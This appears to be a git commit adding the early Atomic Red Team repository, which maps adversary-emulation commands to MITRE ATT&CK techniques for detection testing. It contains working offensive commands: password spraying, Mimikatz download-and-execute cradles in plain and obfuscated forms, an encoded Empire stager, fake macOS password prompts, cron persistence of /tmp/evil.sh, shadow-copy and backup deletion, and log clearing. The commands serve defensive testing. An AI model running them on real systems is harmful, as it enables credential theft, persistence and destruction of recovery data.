commit
ac8dd2cfec
|
@ -0,0 +1,22 @@
|
||||||
|
|
||||||
|
The MIT License
|
||||||
|
|
||||||
|
Copyright (c) 2016 Red Canary, Inc.
|
||||||
|
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
|
of this software and associated documentation files (the "Software"), to deal
|
||||||
|
in the Software without restriction, including without limitation the rights
|
||||||
|
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||||
|
copies of the Software, and to permit persons to whom the Software is
|
||||||
|
furnished to do so, subject to the following conditions:
|
||||||
|
|
||||||
|
The above copyright notice and this permission notice shall be included in
|
||||||
|
all copies or substantial portions of the Software.
|
||||||
|
|
||||||
|
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||||
|
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||||
|
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||||
|
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||||
|
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||||
|
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||||
|
THE SOFTWARE.
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Bash History
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
|
||||||
|
|
||||||
|
|
||||||
|
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
|
|
@ -0,0 +1,21 @@
|
||||||
|
## MITRE ATT&CK Matrix - Linux
|
||||||
|
|
||||||
|
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||||
|
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||||
|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||||
|
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||||
|
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
|
||||||
|
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||||
|
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||||
|
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||||
|
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||||
|
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
|
||||||
|
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||||
|
| | | Install Root Certificate | | | | | | | Multiband Communication |
|
||||||
|
| | | Masquerading | | | | | | | Multilayer Encryption |
|
||||||
|
| | | Redundant Access | | | | | | | Remote File Copy |
|
||||||
|
| | | Scripting | | | | | | | Standard Application Layer Protocol |
|
||||||
|
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
|
||||||
|
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
|
||||||
|
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
|
||||||
|
| | | | | | | | | | Web Service |
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Bash History
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
|
||||||
|
|
||||||
|
|
||||||
|
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Bash History
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
|
||||||
|
|
||||||
|
|
||||||
|
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
|
|
@ -0,0 +1,18 @@
|
||||||
|
# AppleScript
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
|
||||||
|
|
||||||
|
## One-Liners
|
||||||
|
|
||||||
|
### Execute Shell Scripts
|
||||||
|
|
||||||
|
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
|
||||||
|
|
||||||
|
https://github.com/EmpireProject/Empire
|
||||||
|
|
||||||
|
|
||||||
|
### Prompt User for Password (Local Phishing)
|
||||||
|
|
||||||
|
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
|
||||||
|
|
||||||
|
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
|
|
@ -0,0 +1,26 @@
|
||||||
|
## MITRE ATT&CK Matrix - Mac
|
||||||
|
|
||||||
|
|
||||||
|
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||||
|
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||||
|
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
|
||||||
|
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
|
||||||
|
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
|
||||||
|
| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||||
|
| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||||
|
| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||||
|
| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||||
|
| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
|
||||||
|
| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
|
||||||
|
| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
|
||||||
|
| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption |
|
||||||
|
| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy |
|
||||||
|
| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol |
|
||||||
|
| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol |
|
||||||
|
| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol |
|
||||||
|
| Trap | | Masquerading | | | | | | | Uncommonly Used Port |
|
||||||
|
| Valid Accounts | | Plist Modification | | | | | | | Web Service |
|
||||||
|
| Web Shell | | Redundant Access | | | | | | | |
|
||||||
|
| | | Scripting | | | | | | | |
|
||||||
|
| | | Space after Filename | | | | | | | |
|
||||||
|
| | | Valid Accounts | | | | | | | |
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Bash History
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
|
||||||
|
|
||||||
|
|
||||||
|
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
|
|
@ -0,0 +1,13 @@
|
||||||
|
# atomic-red-team
|
||||||
|
Small and highly portable detection tests mapped to the Mitre ATT&CK
|
||||||
|
Framework.
|
||||||
|
|
||||||
|
[Windows MITRE ATT&CK Matrix](Windows/Windows.md)
|
||||||
|
|
||||||
|
[Mac MITRE ATT&CK Matrix](Mac/Mac.md)
|
||||||
|
|
||||||
|
[Linux MITRE ATT&CK Matrix](Linux/Linux.md)
|
||||||
|
|
||||||
|
#### We did not create the MITRE ATT&CK Framework, we just think it is awesome and extensive.
|
||||||
|
|
||||||
|
#### ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Clipboard Data
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## cmd
|
||||||
|
|
||||||
|
<command> | clip
|
||||||
|
clip < readme.txt
|
||||||
|
|
||||||
|
## PowerShell
|
||||||
|
|
||||||
|
echo Get-Process > things.txt
|
||||||
|
powershell
|
||||||
|
Get-Clipboard | iex
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Brute Force
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
|
||||||
|
|
||||||
|
## net.exe
|
||||||
|
|
||||||
|
### Password Spray
|
||||||
|
|
||||||
|
|
||||||
|
net user /domain > DomainUsers.txt
|
||||||
|
echo "Password1" >> pass.txt
|
||||||
|
echo "1q2w3e4r" >> pass.txt
|
||||||
|
|
||||||
|
Execute:
|
||||||
|
|
||||||
|
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
|
|
@ -0,0 +1,35 @@
|
||||||
|
# Create Account
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
|
||||||
|
|
||||||
|
## Net.exe
|
||||||
|
|
||||||
|
Local user add:
|
||||||
|
|
||||||
|
Net user /add Trevor SmshBgr123
|
||||||
|
|
||||||
|
Add new user to localgroup:
|
||||||
|
|
||||||
|
net localgroup administrators jack /add
|
||||||
|
|
||||||
|
Domain add:
|
||||||
|
|
||||||
|
net user username \password \domain
|
||||||
|
|
||||||
|
Add user to Active Directory:
|
||||||
|
|
||||||
|
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
|
||||||
|
|
||||||
|
# Powershell 5.1
|
||||||
|
|
||||||
|
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
|
||||||
|
|
||||||
|
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
|
||||||
|
|
||||||
|
## Add User
|
||||||
|
|
||||||
|
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account'
|
||||||
|
|
||||||
|
## Create a group
|
||||||
|
|
||||||
|
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
|
|
@ -0,0 +1,36 @@
|
||||||
|
# Credential Dumping
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
|
||||||
|
|
||||||
|
|
||||||
|
## Powershell Mimikatz
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||||
|
|
||||||
|
## Gsecdump
|
||||||
|
|
||||||
|
[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
gsecdump -a
|
||||||
|
|
||||||
|
## Windows Credential Editor
|
||||||
|
|
||||||
|
[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wce -o output.txt
|
||||||
|
|
||||||
|
Output:
|
||||||
|
|
||||||
|
C:\>wce -o output.txt
|
||||||
|
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
|
||||||
|
Use -h for help.
|
||||||
|
|
||||||
|
C:\>type output.txt
|
||||||
|
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
|
||||||
|
C:\>
|
|
@ -0,0 +1,31 @@
|
||||||
|
# File Deletion
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
|
||||||
|
|
||||||
|
## cmd
|
||||||
|
|
||||||
|
del /f filename
|
||||||
|
rmdir example
|
||||||
|
|
||||||
|
## PowerShell
|
||||||
|
|
||||||
|
Remove-Item –path c:\testfolder –recurse
|
||||||
|
|
||||||
|
## vssadmin
|
||||||
|
|
||||||
|
vssadmin.exe Delete Shadows /All /Quiet
|
||||||
|
|
||||||
|
|
||||||
|
## wmic
|
||||||
|
|
||||||
|
wmic shadowcopy delete
|
||||||
|
|
||||||
|
## bcdedit
|
||||||
|
|
||||||
|
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
||||||
|
|
||||||
|
bcdedit /set {default} recoveryenabled no
|
||||||
|
|
||||||
|
## wbadmin
|
||||||
|
|
||||||
|
wbadmin delete catalog -quiet
|
|
@ -0,0 +1,13 @@
|
||||||
|
## Indicator Removal on Host
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070)
|
||||||
|
|
||||||
|
## Wevtutil
|
||||||
|
|
||||||
|
Clear system logs
|
||||||
|
|
||||||
|
wevtutil cl System
|
||||||
|
|
||||||
|
Clear Security logs
|
||||||
|
|
||||||
|
wevtutil cl Security
|
|
@ -0,0 +1,47 @@
|
||||||
|
## Account Discovery
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
|
||||||
|
|
||||||
|
|
||||||
|
### Net user and group Enumeration
|
||||||
|
|
||||||
|
Domain Group Enumeration:
|
||||||
|
|
||||||
|
net groups "domain administrators" /domain
|
||||||
|
|
||||||
|
Domain User Enumeration:
|
||||||
|
|
||||||
|
net user <username> /domain
|
||||||
|
|
||||||
|
Local Group Enumeration:
|
||||||
|
|
||||||
|
net localgroup "administrators"
|
||||||
|
|
||||||
|
Local User Enumeration:
|
||||||
|
|
||||||
|
net user
|
||||||
|
|
||||||
|
|
||||||
|
## wmic.exe
|
||||||
|
|
||||||
|
### Reconnaissance
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic useraccount get /ALL
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic process get caption,executablepath,commandline
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic qfe get description,installedOn /format:csv
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
|
@ -0,0 +1,12 @@
|
||||||
|
## File and Directory Discovery
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
|
||||||
|
|
||||||
|
### Directory listing
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
dir c:\ >> %temp%\download
|
||||||
|
dir "c:\Documents and Settings" >> %temp%\download
|
||||||
|
dir "c:\Program Files\" >> %temp%\download
|
||||||
|
dir d:\ >> %temp%\download
|
|
@ -0,0 +1,46 @@
|
||||||
|
## Query Registry
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1012](https://attack.mitre.org/wiki/Technique/T1012)
|
||||||
|
|
||||||
|
|
||||||
|
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
|
||||||
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
|
||||||
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
|
||||||
|
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
|
||||||
|
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
|
||||||
|
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
|
||||||
|
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
|
||||||
|
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
||||||
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
||||||
|
|
||||||
|
Use the following command (as Administrator) to view the drivers configured to load during startup:
|
||||||
|
|
||||||
|
reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
|
||||||
|
|
||||||
|
Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
|
|
||||||
|
Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
|
||||||
|
|
||||||
|
Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
reg save HKLM\Security security.hive (Save security hive to a file)
|
||||||
|
reg save HKLM\System system.hive (Save system hive to a file)
|
||||||
|
reg save HKLM\SAM sam.hive (Save sam to a file)=
|
||||||
|
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
|
||||||
|
reg export [RegDomain]\[Key] [FileName]
|
||||||
|
reg import [FileName ]
|
||||||
|
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
|
||||||
|
|
||||||
|
Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
|
||||||
|
|
||||||
|
Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
|
|
@ -0,0 +1,19 @@
|
||||||
|
# Remote System Discovery
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
|
||||||
|
|
||||||
|
### net.exe
|
||||||
|
|
||||||
|
net view /domain
|
||||||
|
|
||||||
|
net view
|
||||||
|
|
||||||
|
### Ping
|
||||||
|
|
||||||
|
Ping Sweep:
|
||||||
|
|
||||||
|
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
|
||||||
|
|
||||||
|
### ARP
|
||||||
|
|
||||||
|
arp -a
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Remote System Discovery
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
|
||||||
|
|
||||||
|
|
||||||
|
## SystemInfo
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
systeminfo
|
||||||
|
|
||||||
|
## Reg
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
|
|
@ -0,0 +1,19 @@
|
||||||
|
## System Owner/User Discovery
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
|
||||||
|
|
||||||
|
### cmd.exe
|
||||||
|
|
||||||
|
"cmd.exe" /C whoami
|
||||||
|
|
||||||
|
### wmic.exe
|
||||||
|
|
||||||
|
wmic useraccount get /ALL
|
||||||
|
|
||||||
|
### quser
|
||||||
|
|
||||||
|
quser /SERVER:"<computername>"
|
||||||
|
|
||||||
|
### qwinsta
|
||||||
|
|
||||||
|
qwinsta.exe" /server:<computername>
|
|
@ -0,0 +1,5 @@
|
||||||
|
## bitsadmin.exe
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1
|
|
@ -0,0 +1,16 @@
|
||||||
|
## InstallUtil
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
|
||||||
|
|
||||||
|
### Execution Examples:
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
|
|
||||||
|
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
|
||||||
|
|
|
@ -0,0 +1,68 @@
|
||||||
|
# PowerShell
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
|
||||||
|
|
||||||
|
### Download Mimikatz and Dump credentials
|
||||||
|
|
||||||
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||||
|
|
||||||
|
### Download Mimikatz and Dump credentials
|
||||||
|
|
||||||
|
Just download it:
|
||||||
|
|
||||||
|
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
|
||||||
|
|
||||||
|
Minor obfuscation:
|
||||||
|
|
||||||
|
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
|
||||||
|
|
||||||
|
All obfuscation:
|
||||||
|
|
||||||
|
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
|
||||||
|
|
||||||
|
Mimikatz - Cradlecraft PsSendKeys
|
||||||
|
|
||||||
|
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
|
||||||
|
|
||||||
|
